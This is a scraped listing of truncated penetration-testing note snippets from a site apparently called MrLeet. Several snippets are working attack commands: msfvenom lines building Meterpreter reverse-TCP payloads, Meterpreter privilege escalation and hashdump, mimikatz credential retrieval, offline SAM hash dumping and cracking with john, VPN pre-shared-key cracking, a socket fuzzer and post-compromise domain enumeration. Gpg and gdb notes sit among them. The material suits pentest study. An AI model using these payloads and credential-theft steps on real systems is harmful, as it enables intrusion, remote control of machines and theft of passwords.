Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:20:51

------------------------------------------ Mobile Application Test Notes (iPhone)


Prepping Device and Application:

[+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
[+] Enable SSH on iPhone/iPad
[+] Install iFunbox to install the application (http://www.i-funbox.com)
[+] Connect device to lab wireless network
[+] Add web proxy se...


Score: 0

By: ajayverma 2019-06-25 11:20:57

[+] Creating Metasploit Payloads

List payloads
msfvenom -l

Binaries

Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f ex...


Score: 0

By: ajayverma 2019-06-25 11:21:01

[+] Meterpreter Shell

meterpreter > sysinfo

meterpreter > getuid

meterpreter > getsystem

meterpreter > hashdump

meterpreter > load/use mimikatz

kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom commannd
msv Attempt...


Score: 0

By: ajayverma 2019-06-25 11:21:04

fdisk -l

mount -t ntfs /dev/sda1 /mnt

df -k

cd /mnt
ls
cd WINDOWS/system32/config

ls
bkhive system /root/hive.txt
samdump2 SAM /root/hive.txt > /root/hash.txt

john /root/hash.txt -format=nt2 -users=Administrator
cd /root/.john
ls -l
cat john.pot...


Score: 0

By: ajayverma 2019-06-25 11:21:08

Aggressive Mode VPN -- IKE-Scan, PSK-Crack

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump an...


Score: 0

By: ajayverma 2019-06-25 11:12:22

Enumeration is the key.
(Linux) privilege escalation is all about:
Collect - Enumeration, more enumeration and some more enumeration.
Process - Sort through data, analyse and prioritisation.
Search - Know what to search for and where to find the exploit code.
Adapt - Customize the exploit, so it fits. Not every exploit work for every system &q...


Score: 0

By: ajayverma 2019-06-25 11:07:59

Encrypt
------------
sudo gpg -e ~/Desktop/file.doc

This will prompt you to type in the persons name (public key) to encrypt with.

Decrypt
-----------
sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc


Import other users' public keys by using:

sudo gpg --import <key>...


Score: 0

By: ajayverma 2019-06-25 11:08:04

set disassembly-flavor intel

$ cat ~/.bash_aliases | grep gdb
alias gdb='gdb -quiet'

Running gdb
------------------
$ gdb - run, then use file command to load object
$ gdb -quiet - supress copyright information
$ gdb object - normal debug
$ gdb object core - analyze core dump
$ gdb object pid - atta...


Score: 0

By: ajayverma 2019-06-25 11:08:08

[+] Fuzzing:

import socket

buffer = ["A"]
counter = 50

while len(buffer) <= 1000:
buffer.append("A" * counter)
counter = counter + 50

for buffstring in buffer:
print "Fuzzing:" + str(len(buffstring))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( ("1...


Score: 0

By: ajayverma 2019-06-25 11:08:16

[+] After compromising a Windows machine:

[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain

[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE

[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/s...


Score: 0